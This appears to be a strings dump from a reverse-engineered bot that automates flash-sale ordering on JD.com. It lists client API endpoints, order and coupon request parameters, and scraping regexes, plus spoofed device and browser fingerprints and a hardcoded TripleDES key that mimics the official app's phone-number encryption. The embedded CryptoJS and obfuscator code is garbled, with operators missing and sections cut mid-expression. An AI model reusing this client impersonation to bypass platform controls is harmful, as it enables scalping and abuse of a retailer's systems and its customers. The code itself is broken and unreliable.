[0].cityId
[0].countyId
[0].townId
[0].provinceName
[0].cityName
[0].countyName
[0].townName
[0].name
[0].mobile
[0].email
[0].mobileWithXing
[0].addressDetail
&orderParam.codTimeType=3&orderParam.sendPayFor411=&orderParam.mobileKey=
&orderParam.townName=
&orderParam.countyName=
&orderParam.cityName=
&num=1&orderParam.provinceName=
&orderParam.usualAddressId=
&orderParam.invoiceCompanyName=
&orderParam.invoiceContent=
&orderParam.password=&orderParam.invoiceTitle=
&orderParam.paymentType=
&orderParam.townId=
&orderParam.countyId=
&orderParam.cityId=
&orderParam.provinceId=
&orderParam.email=
&orderParam.mobile=
&orderParam.addressDetail=
orderParam.name=
.jd.com/seckill/submitOrder.action?skuId=
.jd.com/async/getCouponList.action?skuId=
couponType="(\d{1,})".*?couponId="(.*?)".*?couponKey="(.*?)".*?hookbox(.*?)>[\s\S]{1,200}>(\d.*?)[\s-]{1,5}(\d.*?)<
.jd.com/async/cancelCoupon.action?skuId=
couponType="1".*?couponId="(.*?)".*?couponKey="(.*?)".*?hookbox(.*?)>[\s\S]{1,200}>(
couponType="1".*?couponId="(.*?)".*?couponKey="(.*?)".*?hookbox(.*?)>[\s\S]{1,200}>(\d.*?)[\s-]{1,5}(\d.*?)<
.jd.com/async/useCoupon.action?skuId=
operations
hXXp://api.m.jd.com/client.action?functionId=cartAdd&uuid=
cartInfo.vendors
].sorted
cartInfo.vendors[
].itemType
].sorted[
].item.Id
].item.Num
].item.suitType
].item.Skus
].item.Skus[
].Num
].item.Gifts
].item.Gifts[
].AwardType
].item.SType
isOpenPaymentPassword
isSupportAllInvoice
hXXp://api.m.jd.com/client.action?functionId=currentOrder&uuid=
hXXp://api.m.jd.com/client.action?functionId=cartCheckAll&uuid=
hXXp://api.m.jd.com/client.action?functionId=cartRemove&uuid=
hXXp://api.m.jd.com/client.action?functionId=cart&uuid=
hXXp://api.m.jd.com/client.action?functionId=miaoShaClock&uuid=
hXXp://api.m.jd.com/client.action?functionId=miaoShaAreaList&uuid=
].canSelectPromotions
].type
].canSelectPromotions[
].title
].checkType
hXXp://api.m.jd.com/client.action?functionId=changePromotion&uuid=
].Gifts
].PriceShow
].Gifts[
hXXp://api.m.jd.com/client.action?functionId=cartRemoveGift&uuid=
].jBeans.id
cartInfo.PriceShow
shoppingCart_webSite
securityPayPassword
hXXp://api.m.jd.com/client.action?functionId=getInternationalAuthInfo&uuid=
authInfo.isAuth
http://v.m.jd.com/international/index.action
hXXp://v.m.jd.com/international/getInternationalAuthInfo.json?sid=
hXXp://v.m.jd.com/international/index.action?sid=
jdapp;android;5.1.0;4.3;
lastOderInfo.virtualPay.needRemark
lastOderInfo.address
].value
lastOderInfo.usedJdBeanMap.canUseJdBeanCount
lastOderInfo.usedJdBeanMap.useJdBeanCount
lastOderInfo.usedJdBeanMap.totalJdBeanCount
lastOderInfo.usedJdBeanMap.IsUseJdBean
lastOderInfo.virtualPay.IsUseBalance
lastOderInfo.virtualPay.DiscountLipinka
hXXp://api.m.jd.com/client.action?functionId=useBalancePay&uuid=
OrderStr.isUseJdBean
OrderStr.isOpenPaymentPassword
OrderStr.needRemark
OrderStr.canUseJdBeanCount
OrderStr.useJdBeanCount
OrderStr.totalJdBeanCount
hXXp://api.m.jd.com/client.action?functionId=useJdBeanPay&uuid=
].label
].operator
lastOderInfo.payShipMap.payment.paymentName
lastOderInfo.invoice.IdInvoiceType
lastOderInfo.invoice.CompanyName
lastOderInfo.payShipMap.pickShipment.id
&clientVersion=5.0.0&build=27662&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=baidu&area=
hXXp://cart.m.jd.com/client.action?functionId=cartCheckAll&uuid=
SupportJdBean
hXXp://order.m.jd.com/client.action?functionId=submit
].stockStatus
submitOrder.OrderId
submitOrder.FactPrice
submitOrder.OrderType
].parentId
].orderMsg.wareInfoList
].orderMsg.wareInfoList[
].buyCount
].paymentType
].orderStatus
inputPassword
submitOrder.noStockSkuList
submitOrder.noStockSkuList[
hXXp://api.m.jd.com/client.action?functionId=getAddressByPin&uuid=
body={}&
].IdCity
].addressDetail
].IdTown
].Where
].Name
].addressDefault
].Mobile
].IdArea
].IdProvince
lastOderInfo.param.needRemark
supportJdBean
isShortPwd
CryptoJS v3.1.2
code.google.com/p/crypto-js
code.google.com/p/crypto-js/wiki/License
var CryptoJS=CryptoJS||function(u,l){var d={},n=d.lib={},p=function(){},s=n.Base={extend:function(a){p.prototype=this;var c=new p;a&&c.mixIn(a);c.hasOwnProperty("init")||(c.init=function(){c.$super.init.apply(this,arguments)});c.init.prototype=c;c.$super=this;return c},create:function(){var a=this.extend();a.init.apply(a,arguments);return a},init:function(){},mixIn:function(a){for(var c in a)a.hasOwnProperty(c)&&(this[c]=a[c]);a.hasOwnProperty("toString")&&(this.toString=a.toString)},clone:function(){return this.init.prototype.extend(this)}},
q=n.WordArray=s.extend({init:function(a,c){a=this.words=a||[];this.sigBytes=c!=l?c:4*a.length},toString:function(a){return(a||v).stringify(this)},concat:function(a){var c=this.words,m=a.words,f=this.sigBytes;a=a.sigBytes;this.clamp();if(f%4)for(var t=0;t<a;t  )c[f t>>>2]|=(m[t>>>2]>>>24-8*(t%4)&255)<<24-8*((f t)%4);else if(65535<m.length)for(t=0;t<a;t =4)c[f t>>>2]=m[t>>>2];else c.push.apply(c,m);this.sigBytes =a;return this},clamp:function(){var a=this.words,c=this.sigBytes;a[c>>>2]&=4294967295<<
32-8*(c%4);a.length=u.ceil(c/4)},clone:function(){var a=s.clone.call(this);a.words=this.words.slice(0);return a},random:function(a){for(var c=[],m=0;m<a;m =4)c.push(4294967296*u.random()|0);return new q.init(c,a)}}),w=d.enc={},v=w.Hex={stringify:function(a){var c=a.words;a=a.sigBytes;for(var m=[],f=0;f<a;f  ){var t=c[f>>>2]>>>24-8*(f%4)&255;m.push((t>>>4).toString(16));m.push((t&15).toString(16))}return m.join("")},parse:function(a){for(var c=a.length,m=[],f=0;f<c;f =2)m[f>>>3]|=parseInt(a.substr(f,
2),16)<<24-4*(f%8);return new q.init(m,c/2)}},b=w.Latin1={stringify:function(a){var c=a.words;a=a.sigBytes;for(var m=[],f=0;f<a;f  )m.push(String.fromCharCode(c[f>>>2]>>>24-8*(f%4)&255));return m.join("")},parse:function(a){for(var c=a.length,m=[],f=0;f<c;f  )m[f>>>2]|=(a.charCodeAt(f)&255)<<24-8*(f%4);return new q.init(m,c)}},x=w.Utf8={stringify:function(a){try{return decodeURIComponent(escape(b.stringify(a)))}catch(c){throw Error("Malformed UTF-8 data");}},parse:function(a){return b.parse(unescape(encodeURIComponent(a)))}},
r=n.BufferedBlockAlgorithm=s.extend({reset:function(){this._data=new q.init;this._nDataBytes=0},_append:function(a){"string"==typeof a&&(a=x.parse(a));this._data.concat(a);this._nDataBytes =a.sigBytes},_process:function(a){var c=this._data,m=c.words,f=c.sigBytes,t=this.blockSize,b=f/(4*t),b=a?u.ceil(b):u.max((b|0)-this._minBufferSize,0);a=b*t;f=u.min(4*a,f);if(a){for(var e=0;e<a;e =t)this._doProcessBlock(m,e);e=m.splice(0,a);c.sigBytes-=f}return new q.init(e,f)},clone:function(){var a=s.clone.call(this);
a._data=this._data.clone();return a},_minBufferSize:0});n.Hasher=r.extend({cfg:s.extend(),init:function(a){this.cfg=this.cfg.extend(a);this.reset()},reset:function(){r.reset.call(this);this._doReset()},update:function(a){this._append(a);this._process();return this},finalize:function(a){a&&this._append(a);return this._doFinalize()},blockSize:16,_createHelper:function(a){return function(c,m){return(new a.init(m)).finalize(c)}},_createHmacHelper:function(a){return function(c,m){return(new e.HMAC.init(a,
m)).finalize(c)}}});var e=d.algo={};return d}(Math);
(function(){var u=CryptoJS,l=u.lib.WordArray;u.enc.Base64={stringify:function(d){var n=d.words,l=d.sigBytes,s=this._map;d.clamp();d=[];for(var q=0;q<l;q =3)for(var w=(n[q>>>2]>>>24-8*(q%4)&255)<<16|(n[q 1>>>2]>>>24-8*((q 1)%4)&255)<<8|n[q 2>>>2]>>>24-8*((q 2)%4)&255,v=0;4>v&&q 0.75*v<l;v  )d.push(s.charAt(w>>>6*(3-v)&63));if(n=s.charAt(64))for(;d.length%4;)d.push(n);return d.join("")},parse:function(d){var n=d.length,p=this._map,s=p.charAt(64);s&&(s=d.indexOf(s),-1!=s&&(n=s));for(var s=[],q=0,w=0;w<
n;w  )if(w%4){var v=p.indexOf(d.charAt(w-1))<<2*(w%4),b=p.indexOf(d.charAt(w))>>>6-2*(w%4);s[q>>>2]|=(v|b)<<24-8*(q%4);q  }return l.create(s,q)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /="}})();
(function(u){function l(b,e,a,c,m,f,t){b=b (e&a|~e&c) m t;return(b<<f|b>>>32-f) e}function d(b,e,a,c,m,f,t){b=b (e&c|a&~c) m t;return(b<<f|b>>>32-f) e}function n(b,e,a,c,m,f,t){b=b (e^a^c) m t;return(b<<f|b>>>32-f) e}function p(b,e,a,c,m,f,t){b=b (a^(e|~c)) m t;return(b<<f|b>>>32-f) e}for(var s=CryptoJS,q=s.lib,w=q.WordArray,v=q.Hasher,q=s.algo,b=[],x=0;64>x;x  )b[x]=4294967296*u.abs(u.sin(x 1))|0;q=q.MD5=v.extend({_doReset:function(){this._hash=new w.init([1732584193,4023233417,2562383102,271733878])},
_doProcessBlock:function(r,e){for(var a=0;16>a;a  ){var c=e a,m=r[c];r[c]=(m<<8|m>>>24)&16711935|(m<<24|m>>>8)&4278255360}var a=this._hash.words,c=r[e 0],m=r[e 1],f=r[e 2],t=r[e 3],y=r[e 4],q=r[e 5],s=r[e 6],w=r[e 7],v=r[e 8],u=r[e 9],x=r[e 10],z=r[e 11],A=r[e 12],B=r[e 13],C=r[e 14],D=r[e 15],g=a[0],h=a[1],j=a[2],k=a[3],g=l(g,h,j,k,c,7,b[0]),k=l(k,g,h,j,m,12,b[1]),j=l(j,k,g,h,f,17,b[2]),h=l(h,j,k,g,t,22,b[3]),g=l(g,h,j,k,y,7,b[4]),k=l(k,g,h,j,q,12,b[5]),j=l(j,k,g,h,s,17,b[6]),h=l(h,j,k,g,w,22,b[7]),
C,15,b[50]),h=p(h,j,k,g,q,21,b[51]),g=p(g,h,j,k,A,6,b[52]),k=p(k,g,h,j,t,10,b[53]),j=p(j,k,g,h,x,15,b[54]),h=p(h,j,k,g,m,21,b[55]),g=p(g,h,j,k,v,6,b[56]),k=p(k,g,h,j,D,10,b[57]),j=p(j,k,g,h,s,15,b[58]),h=p(h,j,k,g,B,21,b[59]),g=p(g,h,j,k,y,6,b[60]),k=p(k,g,h,j,z,10,b[61]),j=p(j,k,g,h,f,15,b[62]),h=p(h,j,k,g,u,21,b[63]);a[0]=a[0] g|0;a[1]=a[1] h|0;a[2]=a[2] j|0;a[3]=a[3] k|0},_doFinalize:function(){var b=this._data,e=b.words,a=8*this._nDataBytes,c=8*b.sigBytes;e[c>>>5]|=128<<24-c2;var m=u.floor(a/
4294967296);e[(c 64>>>9<<4) 15]=(m<<8|m>>>24)&16711935|(m<<24|m>>>8)&4278255360;e[(c 64>>>9<<4) 14]=(a<<8|a>>>24)&16711935|(a<<24|a>>>8)&4278255360;b.sigBytes=4*(e.length 1);this._process();b=this._hash;e=b.words;for(a=0;4>a;a  )c=e[a],e[a]=(c<<8|c>>>24)&16711935|(c<<24|c>>>8)&4278255360;return b},clone:function(){var b=v.clone.call(this);b._hash=this._hash.clone();return b}});s.MD5=v._createHelper(q);s.HmacMD5=v._createHmacHelper(q)})(Math);
(function(){var u=CryptoJS,l=u.lib,d=l.Base,n=l.WordArray,l=u.algo,p=l.EvpKDF=d.extend({cfg:d.extend({keySize:4,hasher:l.MD5,iterations:1}),init:function(d){this.cfg=this.cfg.extend(d)},compute:function(d,l){for(var p=this.cfg,v=p.hasher.create(),b=n.create(),u=b.words,r=p.keySize,p=p.iterations;u.length<r;){e&&v.update(e);var e=v.update(d).finalize(l);v.reset();for(var a=1;a<p;a  )e=v.finalize(e),v.reset();b.concat(e)}b.sigBytes=4*r;return b}});u.EvpKDF=function(d,l,n){return p.create(n).compute(d,
CryptoJS.lib.Cipher||function(u){var l=CryptoJS,d=l.lib,n=d.Base,p=d.WordArray,s=d.BufferedBlockAlgorithm,q=l.enc.Base64,w=l.algo.EvpKDF,v=d.Cipher=s.extend({cfg:n.extend(),createEncryptor:function(m,a){return this.create(this._ENC_XFORM_MODE,m,a)},createDecryptor:function(m,a){return this.create(this._DEC_XFORM_MODE,m,a)},init:function(m,a,b){this.cfg=this.cfg.extend(b);this._xformMode=m;this._key=a;this.reset()},reset:function(){s.reset.call(this);this._doReset()},process:function(a){this._append(a);return this._process()},
finalize:function(a){a&&this._append(a);return this._doFinalize()},keySize:4,ivSize:4,_ENC_XFORM_MODE:1,_DEC_XFORM_MODE:2,_createHelper:function(m){return{encrypt:function(f,b,e){return("string"==typeof b?c:a).encrypt(m,f,b,e)},decrypt:function(f,b,e){return("string"==typeof b?c:a).decrypt(m,f,b,e)}}}});d.StreamCipher=v.extend({_doFinalize:function(){return this._process(!0)},blockSize:1});var b=l.mode={},x=function(a,f,b){var c=this._iv;c?this._iv=u:c=this._prevBlock;for(var e=0;e<b;e  )a[f e]^=
c[e]},r=(d.BlockCipherMode=n.extend({createEncryptor:function(a,f){return this.Encryptor.create(a,f)},createDecryptor:function(a,f){return this.Decryptor.create(a,f)},init:function(a,f){this._cipher=a;this._iv=f}})).extend();r.Encryptor=r.extend({processBlock:function(a,f){var b=this._cipher,c=b.blockSize;x.call(this,a,f,c);b.encryptBlock(a,f);this._prevBlock=a.slice(f,f c)}});r.Decryptor=r.extend({processBlock:function(a,b){var c=this._cipher,e=c.blockSize,d=a.slice(b,b e);c.decryptBlock(a,b);x.call(this,
a,b,e);this._prevBlock=d}});b=b.CBC=r;r=(l.pad={}).Pkcs7={pad:function(a,b){for(var c=4*b,c=c-a.sigBytes%c,e=c<<24|c<<16|c<<8|c,d=[],l=0;l<c;l =4)d.push(e);c=p.create(d,c);a.concat(c)},unpad:function(a){a.sigBytes-=a.words[a.sigBytes-1>>>2]&255}};d.BlockCipher=v.extend({cfg:v.cfg.extend({mode:b,padding:r}),reset:function(){v.reset.call(this);var a=this.cfg,c=a.iv,a=a.mode;if(this._xformMode==this._ENC_XFORM_MODE)var b=a.createEncryptor;else b=a.createDecryptor,this._minBufferSize=1;this._mode=b.call(a,
this,c&&c.words)},_doProcessBlock:function(a,c){this._mode.processBlock(a,c)},_doFinalize:function(){var a=this.cfg.padding;if(this._xformMode==this._ENC_XFORM_MODE){a.pad(this._data,this.blockSize);var c=this._process(!0)}else c=this._process(!0),a.unpad(c);return c},blockSize:4});var e=d.CipherParams=n.extend({init:function(a){this.mixIn(a)},toString:function(a){return(a||this.formatter).stringify(this)}}),b=(l.format={}).OpenSSL={stringify:function(a){var c=a.ciphertext;a=a.salt;return(a?p.create([1398893684,
1701076831]).concat(a).concat(c):c).toString(q)},parse:function(a){a=q.parse(a);var c=a.words;if(1398893684==c[0]&&1701076831==c[1]){var b=p.create(c.slice(2,4));c.splice(0,4);a.sigBytes-=16}return e.create({ciphertext:a,salt:b})}},a=d.SerializableCipher=n.extend({cfg:n.extend({format:b}),encrypt:function(a,c,b,d){d=this.cfg.extend(d);var l=a.createEncryptor(b,d);c=l.finalize(c);l=l.cfg;return e.create({ciphertext:c,key:b,iv:l.iv,algorithm:a,mode:l.mode,padding:l.padding,blockSize:a.blockSize,formatter:d.format})},
decrypt:function(a,c,b,e){e=this.cfg.extend(e);c=this._parse(c,e.format);return a.createDecryptor(b,e).finalize(c.ciphertext)},_parse:function(a,c){return"string"==typeof a?c.parse(a,this):a}}),l=(l.kdf={}).OpenSSL={execute:function(a,c,b,d){d||(d=p.random(8));a=w.create({keySize:c b}).compute(a,d);b=p.create(a.words.slice(c),4*b);a.sigBytes=4*c;return e.create({key:a,iv:b,salt:d})}},c=d.PasswordBasedCipher=a.extend({cfg:a.cfg.extend({kdf:l}),encrypt:function(c,b,e,d){d=this.cfg.extend(d);e=d.kdf.execute(e,
c.keySize,c.ivSize);d.iv=e.iv;c=a.encrypt.call(this,c,b,e.key,d);c.mixIn(e);return c},decrypt:function(c,b,e,d){d=this.cfg.extend(d);b=this._parse(b,d.format);e=d.kdf.execute(e,c.keySize,c.ivSize,b.salt);d.iv=e.iv;return a.decrypt.call(this,c,b,e.key,d)}})}();
(function(){function u(b,a){var c=(this._lBlock>>>b^this._rBlock)&a;this._rBlock^=c;this._lBlock^=c<<b}function l(b,a){var c=(this._rBlock>>>b^this._lBlock)&a;this._lBlock^=c;this._rBlock^=c<<b}var d=CryptoJS,n=d.lib,p=n.WordArray,n=n.BlockCipher,s=d.algo,q=[57,49,41,33,25,17,9,1,58,50,42,34,26,18,10,2,59,51,43,35,27,19,11,3,60,52,44,36,63,55,47,39,31,23,15,7,62,54,46,38,30,22,14,6,61,53,45,37,29,21,13,5,28,20,12,4],w=[14,17,11,24,1,5,3,28,15,6,21,10,23,19,12,4,26,8,16,7,27,20,13,2,41,52,31,37,47,
2147483674:134219776,2147483675:0,2147483676:133120,2147483677:2080,2147483678:131104,2147483679:134350848}],x=[4160749569,528482304,33030144,2064384,129024,8064,504,2147483679],r=s.DES=n.extend({_doReset:function(){for(var b=this._key.words,a=[],c=0;56>c;c  ){var d=q[c]-1;a[c]=b[d>>>5]>>>31-d2&1}b=this._subKeys=[];for(d=0;16>d;d  ){for(var f=b[d]=[],l=v[d],c=0;24>c;c  )f[c/6|0]|=a[(w[c]-1 l)(]<<31-c%6,f[4 (c/6|0)]|=a[28 (w[c 24]-1 l)(]<<31-c%6;f[0]=f[0]<<1|f[0]>>>31;for(c=1;7>c;c  )f[c]>>>=
4*(c-1) 3;f[7]=f[7]<<5|f[7]>>>27}a=this._invSubKeys=[];for(c=0;16>c;c  )a[c]=b[15-c]},encryptBlock:function(b,a){this._doCryptBlock(b,a,this._subKeys)},decryptBlock:function(b,a){this._doCryptBlock(b,a,this._invSubKeys)},_doCryptBlock:function(e,a,c){this._lBlock=e[a];this._rBlock=e[a 1];u.call(this,4,252645135);u.call(this,16,65535);l.call(this,2,858993459);l.call(this,8,16711935);u.call(this,1,1431655765);for(var d=0;16>d;d  ){for(var f=c[d],n=this._lBlock,p=this._rBlock,q=0,r=0;8>r;r  )q|=b[r][((p^
f[r])&x[r])>>>0];this._lBlock=p;this._rBlock=n^q}c=this._lBlock;this._lBlock=this._rBlock;this._rBlock=c;u.call(this,1,1431655765);l.call(this,8,16711935);l.call(this,2,858993459);u.call(this,16,65535);u.call(this,4,252645135);e[a]=this._lBlock;e[a 1]=this._rBlock},keySize:2,ivSize:2,blockSize:2});d.DES=n._createHelper(r);s=s.TripleDES=n.extend({_doReset:function(){var b=this._key.words;this._des1=r.createEncryptor(p.create(b.slice(0,2)));this._des2=r.createEncryptor(p.create(b.slice(2,4)));this._des3=
r.createEncryptor(p.create(b.slice(4,6)))},encryptBlock:function(b,a){this._des1.encryptBlock(b,a);this._des2.decryptBlock(b,a);this._des3.encryptBlock(b,a)},decryptBlock:function(b,a){this._des3.decryptBlock(b,a);this._des2.encryptBlock(b,a);this._des1.decryptBlock(b,a)},keySize:6,ivSize:2,blockSize:2});d.TripleDES=n._createHelper(s)})();
CryptoJS.mode.ECB=function(){var a=CryptoJS.lib.BlockCipherMode.extend();a.Encryptor=a.extend({processBlock:function(a,b){this._cipher.encryptBlock(a,b)}});a.Decryptor=a.extend({processBlock:function(a,b){this._cipher.decryptBlock(a,b)}});return a}();
var key = CryptoJS.enc.Utf8.parse('np!u5chin@adm!n1aaaaaaa2');
var r = CryptoJS.TripleDES.encrypt(CryptoJS.enc.Utf8.parse(mobile), key, { mode: CryptoJS.mode.ECB, padding: CryptoJS.pad.Pkcs7});
return r.toString();
].item.CanSelectGifts
].item.CanSelectGifts[
].ImgUrl
hXXp://img11.360buyimg.com/n3/
].giftMsg
cartJson.vendors[
lastOderInfo.address.Pin
].Phone
].TownName
].ProvinceName
].CityName
].CountryName
addressList[0].Id
addressList[0].TypeId
hXXp://api.m.jd.com/client.action?functionId=
.Flag
addAddress.AddressId
hXXp://api.m.jd.com/client.action?functionId=saveConsigneeAddress&uuid=
hXXp://api.m.jd.com/client.action?functionId=invoiceGeneral&uuid=
invoiceInfo.invoiceType
invoiceInfo.hasBookSku
invoiceInfo.hasCommonSku
invoiceInfo.vatInvoice.code
invoiceInfo.vatInvoice.canEdit
invoiceInfo.vatInvoice.regBankAccount
invoiceInfo.vatInvoice.regPhone
invoiceInfo.vatInvoice.regAddr
invoiceInfo.vatInvoice.companyName
invoiceInfo.vatInvoice.regBank
hXXp://api.m.jd.com/client.action?functionId=saveInvoice&uuid=
lastOderInfo.invoice.InvoiceTypeName
invoiceInfo.electroInvoice
invoiceInfo.normalInvoice.normalInvoiceContent.supportContent
invoiceInfo.normalInvoice.bookInvoiceContent.supportContent
invoiceInfo.electroInvoice.normalInvoiceContent.supportContent
invoiceInfo.electroInvoice.bookInvoiceContent.supportContent
&clientVersion=4.1.0&build=17402&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=baidu&area=
hXXp://order.m.jd.com/client.action?functionId=getCashCoupons&uuid=
getGiftCard.eGiftCards
getGiftCard.eGiftCards[
].Key
hXXp://order.m.jd.com/client.action?functionId=useLiPinKaPay&uuid=
getGiftCard.GiftCards
getGiftCard.GiftCards[
.vendors
.vendors[
].item.stockState
].item.remainNumInt
].stockState
].remainNumInt
hXXp://cart.m.jd.com/client.action?functionId=cartAdd&uuid=
lastOderInfo.commodities
].isMainSku
lastOderInfo.commodities[
].num
lastOderInfo.address.Phone
lastOderInfo.address.Where
lastOderInfo.address.Mobile
lastOderInfo.address.Name
lastOderInfo.address.IdProvince
lastOderInfo.address.IdCity
lastOderInfo.address.IdArea
lastOderInfo.address.IdTown
lastOderInfo.address.TownName
lastOderInfo.address.Id
lastOderInfo.address.addressDetail
lastOderInfo.address.ProvinceName
lastOderInfo.address.CityName
lastOderInfo.address.CountryName
&clientVersion=4.4.0&build=22955&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=baidu&area=
hXXp://order.m.jd.com/client.action?functionId=
hXXp://order.m.jd.com/client.action?functionId=updateAddress&uuid=
updateAddress.Flag
hXXp://api.m.jd.com/client.action?functionId=paymentType&uuid=
].payMentType
].payMentType[
].available
hXXp://api.m.jd.com/client.action?functionId=shipmentTypes&uuid=
shipmentTypesInfo.jdShipment.bigItemShipDates
shipmentTypesInfo.jdShipment.bigItemShipDates[
shipmentTypesInfo.jdShipment.bigItemShipDates[0].value
shipmentTypesInfo.jdShipment.bigItemInstallDatesList
shipmentTypesInfo.pickShipment.id
shipmentTypesInfo.pickShipment.available
shipmentTypesInfo.jdShipment.available
shipmentTypesInfo.jdShipment.id
shipmentTypesInfo.jdShipment.codeTime
shipmentTypesInfo.otherShipment.available
shipmentTypesInfo.otherShipment.id
shipmentTypesInfo.sopOtherShipment.available
shipmentTypesInfo.sopOtherShipment.id
hXXp://api.m.jd.com/client.action?functionId=savePaymentShipment&uuid=
lastOderInfo.payShipMap.pickShipment.pickId
shipmentTypesInfo.pickShipment.pickSites
shipmentTypesInfo.pickShipment.pickSites[
shipmentTypesInfo.pickShipment.pickDates
shipmentTypesInfo.pickShipment.pickDates[
shipmentTypesInfo.jdShipment.promise311
support
shipmentTypesInfo.jdShipment.promise411
hXXp://api.m.jd.com/client.action?functionId=getCashCouponsByPage&uuid=
usedElecCoupons.Coupons
].CanUsed
usedElecCoupons.Coupons[
].CouponType
].platform
].scope
].CouponStyle
].Selected
].limitType
].Quota
].Discount
].TimeBegin
].TimeEnd
hXXp://api.m.jd.com/client.action?functionId=useOrCancelCoupon&uuid=
Coupons[0].Quota
Coupons[0].Discount
Coupons[0].Key
Coupons[0].Id
usedElecCoupons.Flag
&clientVersion=4.4.3&build=23599&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=baidu&area=
hXXp://order.m.jd.com/client.action?functionId=useOrCancelCoupon&uuid=
hXXp://api.m.jd.com/client.action?functionId=useLiPinKaPay&uuid=
lastOderInfo.virtualPay.FactPrice
getByKey
hXXp://api.m.jd.com/client.action?functionId=getByKey&uuid=
m.jd.hk
p.m.jd.com
hXXp://p.m.jd.com/cart/cart.action?sid=
Mozilla/5.0 (Linux; U; Android 4.3; zh-CN; A0001 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/10.6.2.626 U3/0.8.0 Mobile Safari/534.30
/cart/cart.action
&returnurl=hXXp://
hXXps://passport.m.jd.com/user/login.action?sid=
/cart/cart.action?sid=
dv(A0001);pr(UCBrowser/10.6.2.626);ov(Android 4.3);ss(360*640);pi(1080*1920);bt(YZ);pm(1);bv(1);nm(0);im(0);sr(0);nt(2);
/norder/order.action?enterOrder=true&sid=
hXXp://p.m.jd.com/cart/cart.action
<div class=.sitem-l.>([\s\S]*?)<[\s\S]*?sitem-r.>([\s\S]*?)<
orderKeyUrl" value="
orderKey" value="
hXXp://x.jd.com/clkinfo?rid=0.29329750477336347&callback=jsonp1
/norder/submit.action?sid=
/norder/order.action?enterOrder=true
Mozilla/5.0 (Linux; Android 4.4.2; NoxW Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36
hXXp://m.jd.hk
com.android.browser
order.securityPayPassword=&paymentType=
&order.securityPayPassword=
&flowType=&order.paymentId=
/norder/checkAndSubmitOrder.json
hXXp://p.m.jd.com
messageDialog.message
hXXp://p.m.jd.com/norder/payShipment.action?sid=
hXXp://p.m.jd.com/norder/order.action?enterOrder=true&sid=
order.pickSiteId" value="
order.sopOtherShipmentId" value="67"
&order.sopOtherShipmentId=67
&order.bigItemShipDate=
&order.codeTimeId=3
hXXp://p.m.jd.com/norder/pickSiteList.action?pickSiteId=
order.shipmentId" value="65"
order.shipmentId" value="66"
&order.promiseMessage=
&order.promiseTimeRange=
&order.promiseDate=
&order.promiseType=1&order.promiseSendPay=
hXXp://p.m.jd.com/norder/savePaymentShipment.action?sid=
&order.pickDateId=
&order.pickSiteId=
&order.shipmentId=
order.paymentId=
/norder/address.action?sid=
keyDown.*?(\d{6,})\D
keyDown\('(\d*)'\)
keyDown('
/norder/editAddress.action?vtuanOrder=false&addressId=
hXXp://p.m.jd.com/norder/address.action?sid=
address.name
address.mobile
address.provinceNameIgnore
address.idProvince
address.cityNameIgnore
address.idCity
address.areaNameIgnore
address.idArea
address.townNameIngore
address.idTown
address.where
hXXp://p.m.jd.com/unifiedlogin/checkcredentials.action?returnUrl=http://m.jd.hk/norder/updateAddress.action?
&address.where=
&address.idTown=
&address.idArea=
&address.idCity=
&address.idProvince=
&address.mobile=
&defaultFlag=1&address.name=
&address.zip=&vtuanOrder=false&address.oldMobile=
address.id=
/norder/updateAddress.action?sid=
&address.longitude=1000.0&address.latitude=1000.0&address.coordType=2&address.validRegion=false
&cartUse=true&address.name=
&address.townNameIngore=
&address.areaNameIgnore=
&address.cityNameIgnore=
&address.provinceNameIgnore=
&defaultFlag=1&address.addressDefault=
/norder/addOrUpdateAddress.json?sid=
hXXp://p.m.jd.com/norder/editAddress.action?vtuanOrder=false&addressId=
updateAddress.Message
hXXp://p.m.jd.com/norder/invoice.action?sid=
value="(.*?)".*?name="vatInvoiceFormData.code
value="(.*?)".*?name="vatInvoiceFormData.idInvoiceHeaderType
value="(.*?)".*?name="vatInvoiceFormData.idInvoiceContentsType
&vatInvoiceFormData.consigneeAddress=
&vatInvoiceFormData.consigneePhone=
&vatInvoiceFormData.consigneeTown=
&vatInvoiceFormData.consigneeTownId=
&vatInvoiceFormData.consigneeCounty=
&vatInvoiceFormData.consigneeCountyId=
&vatInvoiceFormData.consigneeCity=
&vatInvoiceFormData.consigneeCityId=
&vatInvoiceFormData.consigneeProvince=
&vatInvoiceFormData.consigneeProvinceId=
&vatInvoiceFormData.consigneeName=
&vatInvoiceFormData.idInvoiceContentsType=
&vatInvoiceFormData.idInvoiceHeaderType=
&vatInvoiceFormData.regBankAccount=
&vatInvoiceFormData.regPhone=
&vatInvoiceFormData.regAddr=
&vatInvoiceFormData.regBank=
&vatInvoiceFormData.code=
vatInvoiceFormData.vatCompanyName=
hXXp://p.m.jd.com/norder/updateVatInvoice.action?sid=
&normalInvoiceFormData.idInvoiceContentTypeBook=
normalInvoiceFormData.companyName=&personInvoiceTitleContant=个人&normalInvoiceFormData.idInvoiceHeaderType=-1&normalInvoiceFormData.idInvoiceContentsType=
&normalInvoiceFormData.idInvoiceContentsType=
&personInvoiceTitleContant=个人&normalInvoiceFormData.idInvoiceHeaderType=
normalInvoiceFormData.companyName=
&dzpInvoiceFormData.idInvoiceContentTypeBook=
&dzpInvoiceFormData.idInvoiceHeaderType=4&dzpInvoiceFormData.idInvoiceContentsType=
&dzpInvoiceFormData.electroInvoiceEmail=
dzpInvoiceFormData.electroInvoicePhone=
hXXp://p.m.jd.com/norder/updateEleInvoice.action?sid=
hXXp://p.m.jd.com/norder/updateNormalInvoice.action?sid=
149,100,237
127,255,80
105,210,30
255,127,0
158,95,160
184,222,135
42,165,42
43,138,226
235,255,205
228,255,196
245,245,220
255,127,212
205,154,50
this.ShieldEncoder = (function() {
this.init()
e.prototype = {
var g = new f().handle(j);
h = i.first(h);
h = this.encoder(h, g);
h = i.last(h);
for (var h = 0; h < k.length; h  ) {
g  = String.fromCharCode(k.charCodeAt(h) ^ j)
d.prototype = {
for (var g = 0; g < h.length; g  ) {
l  = h.charAt(g);
if (l.length == 5) {
k.push(this.reverse(l));
